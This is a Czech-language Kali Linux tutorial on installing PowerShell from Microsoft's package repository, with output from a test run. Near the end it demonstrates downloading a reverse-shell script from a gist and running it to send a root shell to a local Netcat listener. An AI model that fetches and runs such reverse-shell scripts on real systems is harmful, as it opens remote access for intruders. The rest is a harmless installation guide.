AKTUALIZACE LISTOPAD 2019
Tento příspěvek je od roku 2019 zastaralý, protože do primárních repozitářů byl přidán powershell. Stačí udělat:
apt update && apt -y install powershell
A ve svém systému budete mít powershell.
Starý příspěvek
Možná si již uvědomujete, že do své instalace Kali Linux můžete bezpečně přidat externí úložiště, ale možná si neuvědomujete, že jedno z mnoha úložišť dostupných online obsahuje úložiště od společnosti Microsoft, které obsahuje PowerShell. Úložiště je pro Debian, ale jeho balíčky se na Kali instalují naprosto dobře, jak ukážeme v tomto příspěvku.
Instalace balíčku PowerShell v Kali
Začneme instalací nezbytných závislostí, z nichž většina by již měla být ve výchozím nastavení nainstalována ve vaší instalaci Kali.
apt update && apt -y install curl gnupg apt-transport-https
Dále si musíme stáhnout a přidat klíč GPG veřejného úložiště, aby APT balíčkům důvěřoval a upozorňoval vás na jakékoli problémy s podpisy balíčků.
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
S přidaným klíčem GPG přistoupíme k přidání úložiště balíčků Microsoft do jeho vlastního souboru se seznamem balíčků pod /etc/apt/sources.list.d/ a aktualizujte seznam dostupných balíčků.
echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/powershell.list
apt update
Nakonec přistoupíme k instalaci balíčku powershell.
apt -y install powershell
Spuštění prostředí PowerShell
Po dokončení instalace balíčku spusťte pwsh spustí PowerShell a zobrazí nám známou výzvu „PS“.
[email protected]:~# pwsh
PowerShell v6.1.0-preview.2
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
PS /root>
Pokud s PowerShell teprve začínáte, jednou z prvních věcí, kterou budete pravděpodobně chtít udělat, je aktualizovat vestavěnou nápovědu, což lze provést spuštěním Nápověda k aktualizaci Rutina. Dokončení může chvíli trvat, ale opravdu je potřeba jej spustit jen jednou za čas.
PS /root> Update-Help
Updating Help for module Microsoft.PowerShell.Utility
Locating Help Content...
Jak byste mohli očekávat, nenajdete všechny příkazy, na které jste zvyklí při používání PowerShellu ve Windows, ale všechny základní moduly jsou přítomny a kód je neustále vyvíjen a vylepšován.
PS /root> Get-Process -Name gnome*
NPM(K) PM(M) WS(M) CPU(s) Id SI ProcessName
------ ----- ----- ------ -- -- -----------
0 0.00 5.71 0.03 1073 072 gnome-keyring-d
0 0.00 9.80 0.19 659 649 gnome-session-b
0 0.00 13.72 0.36 1089 080 gnome-session-b
0 0.00 110.06 3.36 778 649 gnome-shell
0 0.00 277.15 27.85 1170 080 gnome-shell
0 0.00 11.77 0.09 1199 075 gnome-shell-cal
0 0.00 77.79 4.58 1381 080 gnome-software
0 0.00 36.58 2.03 1646 646 gnome-terminal-
Jedna z překvapivých věcí, které můžete je však použít PowerShell k odeslání zpětného prostředí naslouchacímu systému Netcat. Narazili jsme online na malý reverzní shell PowerShell a k našemu překvapení se šťastně připojil zpět k našemu posluchači.
[email protected]:~# pwsh
PowerShell v6.1.0-preview.2
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
PS /root> wget -q https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
PS /root> ./mini-reverse.ps1
────────────────────────────────────────────────────────────────────────────────
[email protected]:~# nc -lvnp 413
listening on [any] 413 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 59006
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux kali 4.15.0-kali3-amd64 #1 SMP Debian 4.15.17-1kali1 (2018-04-25) x86_64 GNU/Linux
Myslíme si, že je pozoruhodné, že nejen Microsoft Open-source PowerShell, ale také jej neustále aktualizoval a vylepšoval a díky veřejnému úložišti balíčků je instalace hračkou.